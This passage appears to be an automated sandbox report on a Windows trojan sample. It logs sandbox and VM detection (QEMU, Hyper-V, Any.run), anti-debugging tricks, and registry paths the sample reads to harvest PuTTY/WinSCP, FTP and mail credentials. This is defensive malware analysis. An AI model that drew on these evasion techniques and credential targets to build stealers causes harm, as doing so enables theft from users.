            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_004090B5 push ss; retf 0_2_004090FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_004091BA push ss; retf 0_2_004091FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7399C push ebp; retn FFFFh0_2_02B75002
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_0056399C push ebp; retn FFFFh1_2_00565002
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7125A rdtsc 0_2_02B7125A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe TID: 6424Thread sleep count: 93 > 30Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe TID: 6200Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe TID: 6200Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeLast function: Thread delayed
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318548075.00000000009F8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWH9
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000000.00000002.1289523618.00000000039EA000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318634748.0000000000A51000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWb
            Source: SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe, 00000001.00000002.1318736145.00000000023DA000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B70727 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00010000,?,?,000000040_2_02B70727
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7125A rdtsc 0_2_02B7125A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00562C78 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00562C78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B77CC0 mov eax, dword ptr fs:[00000030h]0_2_02B77CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B7688A mov eax, dword ptr fs:[00000030h]0_2_02B7688A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B73AEC mov eax, dword ptr fs:[00000030h]0_2_02B73AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B729BA mov eax, dword ptr fs:[00000030h]0_2_02B729BA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B71FFE mov eax, dword ptr fs:[00000030h]0_2_02B71FFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B729E3 mov eax, dword ptr fs:[00000030h]0_2_02B729E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 0_2_02B76F6A mov eax, dword ptr fs:[00000030h]0_2_02B76F6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_005629E3 mov eax, dword ptr fs:[00000030h]1_2_005629E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00567CC0 mov eax, dword ptr fs:[00000030h]1_2_00567CC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00563AEC mov eax, dword ptr fs:[00000030h]1_2_00563AEC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_0056688A mov eax, dword ptr fs:[00000030h]1_2_0056688A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00566F6A mov eax, dword ptr fs:[00000030h]1_2_00566F6A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00561FFE mov eax, dword ptr fs:[00000030h]1_2_00561FFE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeCode function: 1_2_00562C78 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,1_2_00562C78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exe' Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.KillProc2.11384.14756.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior

            Mitre Att&ck Matrix

